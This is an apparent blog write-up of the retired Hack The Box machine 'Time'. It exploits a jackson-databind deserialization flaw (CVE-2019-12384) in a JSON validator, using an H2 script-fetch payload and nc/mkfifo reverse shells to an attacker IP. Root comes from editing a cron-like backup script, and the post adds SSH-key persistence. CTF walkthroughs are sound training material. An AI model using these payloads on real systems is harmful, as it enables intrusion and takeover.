4 minute read Leia também em :brazil: Share

Hello everyone!

The machine of this week will be Time, another Linux box medium rated from Hack The Box, created by egotisticalSW and felamos.

:information_source: Info: Write-ups for Hack the Box are always posted as soon as machines get retired.

HTB Time

Enumeration

We start with the enumeration of published services using a nmap quick scan, where we can see the output below:

$ nmap -sC -sV -Pn -oA quick 10.10.10.214
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-26 16:08 -03
Nmap scan report for 10.10.10.214
Host is up (0.077s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds

80/TCP - HTTP Service

Starting by checking the HTTP service published on port 80, noticed that we have a JSON Validation and Beautifier service.

Online JSON Parser - Time

After some enumeration with whatweb and nikto, I haven’t found anything useful, so I proceeded to app experimentation, looking for some vulnerability that could lead us to some code injection or LFI.

Analyzing the application, we have two functionalities: Beautify and Validate:

  • The option beautify, after receiving a valid JSON, formats it in a pretty manner and, sending an invalid content (e.g. “test”), returns a null value.

Online JSON Parser - Time - beautify

  • The Validate option (in beta) checks the syntax of the JSON provided. When we send an invalid request (e.g. “test”), the exception below is returned.

    Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN
    

Initial Access

After searching for com.fasterxml.jackson.core I have found about the Jackson project, developed by FasterXML and from which core is the base component for jackson-databind, a popular JSON library, here used to implement the formatting and validating features.

Looking for CVEs on jackson-databind, I have found the following for code execution published in 2019, according to the page CVE Details:

CVE Details

Of the 4 listed, I have found for CVE-2019-12384 a working PoC at this blog, which I have used to gain initial access to the box. The following steps were used to get a reverse shell:

  • Created a file called inject.sql with the code below, modified from the version at the blog, to start a reverse shell to the attacker machine at 4443 and published using a python3 HTTP server (sudo python3 -m http.server 80) from the directory where the file resides.

    CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
    $$;
    CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f')
    
  • Configured listener using netcat by running nc -lnvp 4443.
  • Sent payload below in the application instead of a JSON content to be validated.

    ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.10.10/inject.sql'"}]
    

Listener and Webserver - Time

Online Json Parser - Sending the payload

User flag

After upgrading the shell, started enumeration where was identified that the user we were using, pericles, was a regular Linux user with no special permissions granted.

pericles@time:/var/www/html$ id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)

Accessing its root directory found the user flag, as below.

pericles@time:/var/www/html$ cd ~
pericles@time:/home/pericles$ cat user.txt 
<redacted>
pericles@time:/home/pericles$ 

Root flag

Before continuing enumeration, to make easier regaining access if needed, created an SSH key using ssh-keygen and configured the public key in the file ~/.ssh/authorized_keys, allowing us to directly connect to the user pericles via SSH.

The enumeration was done by running linpeas.sh and one of the findings called attention, referring to the machine name: a shell file owned by pericles in the path /usr/bin/timer_backup.sh.

This file is configured as a system timer (/etc/systemd/system/timer_backup.timer and /etc/systemd/system/timer_backup.service) and set be executed every 10 seconds as root.

As we have enough permissions to edit the shell script, I have added the line below to return a reverse shell on the attacker machine and, after a few seconds, a reverse shell was obtained! :smile:

rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/g

As the process is re-executed every 10 sec the process tree is terminated, and we lose the existing connection to the machine. To just get the root flag this time is sufficient, which was as done initially.

$ nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.214] 33304
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
<redacted>
#      

In case you want to get a persistent connection at this machine we have two initial options:

  • Configure the system timer to add the public key in the /root/.ssh/authorized_keys file, allowing us to SSH as root.
  • Spawn another reverse shell as soon as we get the initial connection, which can be done in multiple ways like Metasploit AutoRunScript and netcat, prepending the listener with the instruction to send the payload as soon as it gets connected, as you can see in an example below where the id command is executed as soon as the session is started:
printf "id\n" | nc -lnvp 4443

I hope this was useful to you and see you guys in the next post! :smiley: